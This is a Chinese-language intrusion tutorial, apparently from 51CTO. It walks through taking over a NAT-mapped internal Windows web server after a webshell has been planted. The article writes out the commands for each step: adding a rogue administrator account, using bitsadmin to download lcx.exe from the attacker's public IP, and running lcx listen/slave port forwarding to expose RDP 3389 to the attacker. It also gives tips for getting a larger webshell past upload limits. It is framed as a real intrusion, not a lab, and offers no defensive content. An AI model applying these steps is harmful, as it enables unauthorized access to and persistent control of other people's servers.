完全控制映射到外網的內網web服務器
原創【51CTO.com原創稿件】在很多時候,我們可以獲取到一個菜刀馬,雖然能執行命令,但是上傳文件卻有種種限制,尤其對于映射到外網的web網站,windows系統,即使有最高權限,但是我個人認為遠遠沒有一個3389的遠程桌面來得爽,本篇文章主要講述在有一個菜刀馬的前提下的,如何突破內網映射到公網的主機,直接遠程桌面連接內網的3389!
0x01 前言
我們獲取到一個菜刀馬之后,在權限范圍內可以查看任意目錄,執行任意命令,但是我們常常也會遇到各種各樣坑,如有些文件我們上傳不了,有些文件我們也下載不下來(可能是文件太大,也可能是文件夾不方便下載),有些文件不好壓縮等等,主要是針對windows的web服務器,但是如果我們能獲取到一個3389的遠程桌面,那么這些問題基本可以得以解決!
對于本身就是獨立外網ip的windows主機,那么我們只需要查看主機有沒有開3389端口,如果沒有開的話我們使用命令進行開啟,如果3389已經開啟的情況下,那我們就可以直接添加一個管理員賬號,然后遠程桌面連接即可!但是目前對于相對大一點的公司來說,比如運營商,往往都是通過映射的方式提供外網的一個web服務,其實真正的web服務器則是內網的一臺web服務器,并且該內網服務器同時具備內網和外網的功能,簡單來說,就是同時連接了兩個網絡,一個與內網互通,一個可以訪問外網,而外網卻無法直接訪問,可以簡單理解為家庭路由器!對于這種情況,我們就可以使用端口轉發工具,將內網的3389端口轉發到我們的公網獨立ip上面,從而通過連接我們的公網ip來間接連接內網的3389!
在這里,簡單說一下上面所說的內網地址和公網地址,私有地址(Private address)屬于非注冊地址,專門為組織機構內部使用,俗稱內網地址。以下列出留用的內部私有地址:
A類 10.0.0.0--10.255.255.255
B類 172.16.0.0--172.31.255.255
C類 192.168.0.0--192.168.255.255
公網地址簡單來說就是任何聯網設備都能訪問的地址!
0x02 實戰環境
本次實戰環境是windows server 2008 R2,server版本是apache tomcat/7.0.59!環境如圖1所示:
圖1 操作系統信息
0x03 查看基本信息
我們通過菜刀的虛擬終端查看目標主機的ip地址,發現該IP不是我們公網訪問網站的IP地址,而是一個內網地址,如圖2所示,這里我們認為可能該web是通過映射到公網上進行訪問的
圖2 查看ip地址
在運營商,目前多數開放在公網的業務系統,基本都是通過映射的方式來將業務系統放在公網上面!
另外通過使用whoami查看當前用戶,如圖3所示,發現我們的權限是system權限,顯然是可以執行任意操作的!
圖3 whoami查看
0x04 確定入侵方式
雖然我們可以執行任意操作,但是由于局限于菜刀本身工具的限制,導致我們很多功能受到了大大的限制!并且對于是windows操作系統,我們只有類似cmd的shell,顯然遠遠不能滿足我們的欲望,對于windows系統來說,我的最終目標應該是管理員權限來進行遠程桌面的連接(能不能實現是一回事)!
首先我們查看下當前開放的端口信息,使用netstat –ano查看端口信息發現我們期待的遠程桌面服務端口3389,如圖4所示:
圖4 查看端口信息
此時我們就大體確定了入侵的思路,想辦法連接他的3389端口,因為是system權限,因此我們完全可以添加一個管理員賬號!
思路主要是以下四點:
1、添加一個管理員賬號
2、上傳端口轉發工具
3、進行端口轉發
4、遠程桌面連接
0x05 添加管理員賬號
windows下主要使用net user進行添加賬號,主要命令如下:
net user 顯示系統用戶
net localgroup administrators 顯示管理員賬戶
net user 用戶名 密碼 /add 添加用戶
net localgroup administrators 用戶名 /add 添加用戶到管理員組
如圖5所示,我們成功添加了管理員賬號。
圖5 添加管理員賬號
添加了管理員賬號了,我們接下來就是上傳端口轉發工具!
0x06 上傳端口轉發工具
windows下面,我們常用的端口轉發工具就是lcx.exe,另外還有windows自動的netsh,但是我在自己的環境下試過沒有成功,其他的端口轉發工具可自行百度,對于linux的系統,我個人覺得端口轉發沒什么必要(可能我技術太菜,因為linux可以直接反彈bash,或者自己nc反向連接等,如果有大神知道,煩請多多指導下linux端口轉發的場景),因此我接下來就是直接上傳lcx.exe。
對于上傳文件,我個人主要知道以下方法進行上傳,一是通過上傳點進行上傳,對于這種方式的上傳可參考文章《淺談文件解析及上傳漏洞》 ;二是通過相關工具上傳,比如一些利用工具自帶的上傳功能,如K8的Structs2漏洞利用工具,菜刀的文件上傳功能;三是通過服務器自帶的遠程文件下載工具,如linux的wget,windows的bitsadmin。
由于我們有菜刀馬在手,所以我們現在先使用菜刀自帶的上傳文件功能進行lcx工具的上傳,如圖6所示:
圖6 菜刀馬文件上傳功能
但是我們的運氣很不好,lcx直接上傳失敗,如圖7所示:
圖7 lcx上傳失敗
此時我們可以通過上傳一個大馬,看看能不能通過大馬進行上傳lcx,但是我們又失敗了,如圖8所示:
圖8 大馬上傳失敗
這里可以告訴你們一個方法可以上傳大馬,就是上傳一個jsp的普通馬,然后使用jsp一句話客戶端來上傳大馬就能成功上傳大馬,但是我們的運氣實在是很不好,我們的大馬雖然上傳成功了,但是卻無法正常訪問,如圖9所示:
圖9 大馬訪問失敗
由于這只是一個登陸頁面,也沒有發現有文件上傳功能,所以我們可以使用第三種方法了,使用系統自動的遠程文件下載工具,通過上面我們使用version查看到操作系統是windows的,所以我們選擇使用bitsadmin,通過bitsadmin來下載我們放在公網主機上面的lcx,對于bitsadmin,主要使用語法如下:
bitsadmin /transfer n http://獨立外網ip/lcx.exe c:\lcx.exe
n是jobname,可以隨便命名,后面的一個是遠程文件的路徑,最后一個參數是下載到服務器的路徑及文件名!當我們使用該命令下載lcx到服務器上面時,居然提示failed,如圖10所示:
圖10 bitsadmin下載lcx到服務器失敗
如果你信他真的失敗了,那么就就太天真了,這里可能有一個原因是菜刀馬連接超時了,所以我們依然使用dir來查看下,此時你會很興奮,如圖11所示:
圖11 lcx文件上傳成功
如果真的下載失敗了,可以更名后在進行下載試試!
0x07 端口轉發
既然端口轉發工具上傳成功了,我們可以通過命令執行lcx來看看lcx的使用幫助,如圖12所示:
圖12 lcx使用幫助
簡單點來說,主要使用方法如下:
本地 lcx -listen 51 3388
肉雞 lcx -slave 本機ip 51 肉雞ip 3389
本機ip指的是外網獨立ip的windows主機的ip!
則連接為:127.0.0.1:33891 ,另外可通過本地(局域網)連接本機ip(外網獨立ip)的33891端口進行連接!
51 改則兩個改,3388可改!
簡單點來說,就是本機將肉雞轉發過來的端口進行監聽,并轉發到本機的另一個端口上面,通過連接另一個端口來間接連接肉雞的33898!
本次我們打算將肉雞的3389轉發到我們本機的51端口上面,在將51端口轉發到本機的3388端口,我們先在本機進行監聽,如圖13所示,成功監聽。
圖13 外網ip上面進行監聽
此時我們執行第二條命令來連接到外網IP的51端口上面,但是我們發現虛擬終端提示failed,如圖14所示:
圖14 lcx轉發failed
根據上一個我們懷疑可能不是failed,我們通過查看我們外網IP的監聽情況,發現內網主機已成功將3389轉發到了51端口上面,如圖15所示:
圖15 內網已成功轉發
通過以上相關操作,我們端口轉發已成功,最后就是在本地(局域網)來連接我們外網IP的3388端口來間接遠程桌面連接內網的3389端口!
0x08 遠程桌面連接
最后我們只需要遠程桌面連接外網IP的3388端口即可,如圖16所示,我們成功通過遠程桌面連接了內網的主機。
圖16 成功連接到內網的3389端口
0x09 簡單總結
本篇文件主要是介紹一個簡單的通過公網滲透來連接映射出來的內網主機的遠程桌面端口;其次也是簡單介紹了文件上傳的三種方式,其中,對于linux大家都熟悉使用wget,但是對于windows的,可能還是有部分人不知道bitsadmin這個命令可以遠程下載網絡文件(可能我是菜鳥,所以知道得晚);還有就是對于jsp的網站,如果我們大馬上傳不成功,那么我們可以先上傳一個普通馬(我遇到的基本都能成功上傳,前提是能上傳jsp文件哈),然后使用jsp一句話客戶端來進行大馬上傳,這樣一般都能上傳成功,但是能不能正常訪問就看個人的人品了;最后就是由于菜刀這個工具也是人開發出來的,所以可能還是存在一定的缺陷(也可能是我自身的使用問題),就是對于連接時間或者數據傳輸的一些小問題,如果顯示內容過多,那么就會直接顯示failed,或者有些命令有延遲,也會顯示failed,但是本機卻還在執行命令中,所有有時菜刀虛擬終端提示的failed,最好是驗證下,不要看到failed,就認為是失敗了!
【51CTO原創稿件,合作站點轉載請注明原文作者和出處為51CTO.com】
